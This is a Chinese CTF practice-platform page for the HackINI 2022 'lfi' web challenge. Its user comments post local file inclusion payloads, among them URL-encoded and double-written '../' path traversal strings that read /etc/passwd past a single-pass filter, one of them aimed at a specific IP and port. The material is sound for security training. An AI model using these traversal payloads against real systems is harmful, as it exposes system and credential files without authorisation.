lfiWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 2185
提  示:
描  述:
We made some serious checks now, would you test it ?
评论
starest 1年前

双写绕过,把所有../换成..././即可

回复 0

MoCaser 1年前

我用的url编码 http://49.232.142.230:16456/?language=/..%2f..%2f..%2f..%2fetc/passwd

回复 0

000ooo 1年前

?language=/etc/passwd 有点意外

回复 2

Zhumeng 1年前

根据页面提示输入language 然后 str_replace只替换一次双写绕过通过路径穿越读取/etc/passwd即可读取flag

回复 0

意大利炮 1年前

/?language=/....//....//....//....//etc/passwd

回复 0

小白帽来挖个漏洞 1年前

解析:https://blog.csdn.net/guanrongl/article/details/142967307

回复 0

阿甘先生 1年前

?language=..//etc/passwd

回复 0

jun1223 1年前

?language=/etc/passwd 这也行

回复 3

userxin 1年前

?language=/../../../../../etc/passwd

回复 0

hbesljx 1年前

直接language=....//....//....//....//....//....//etc/passwd即可。..../过滤掉../后还是../

回复 1

WriteUp

image
a2cai

2 金币

评分(3)

解题动态

何以书 攻破了该题 14小时前
pakali 攻破了该题 14小时前
wjzkifaa 攻破了该题 18小时前
13615049106 攻破了该题 1天前
Thr0ne 攻破了该题 2天前
fyjfjk 攻破了该题 2天前
胜天3号 攻破了该题 3天前
KDB 攻破了该题 4天前
Test0x0 攻破了该题 5天前
ggtom 攻破了该题 6天前
politely 攻破了该题 6天前
胰梅子子 攻破了该题 6天前
GlowSnow 攻破了该题 7天前
asdliuyan 攻破了该题 7天前
Hydron 攻破了该题 7天前
lijingxin02 攻破了该题 7天前
lywlbk 攻破了该题 7天前
13817113639 攻破了该题 7天前
eatonyu 攻破了该题 8天前
寒醨 攻破了该题 8天前
问题反馈